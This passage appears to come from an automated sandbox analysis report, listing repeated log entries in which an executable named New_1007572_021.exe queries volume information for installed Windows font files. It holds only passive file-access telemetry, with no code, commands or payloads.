            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
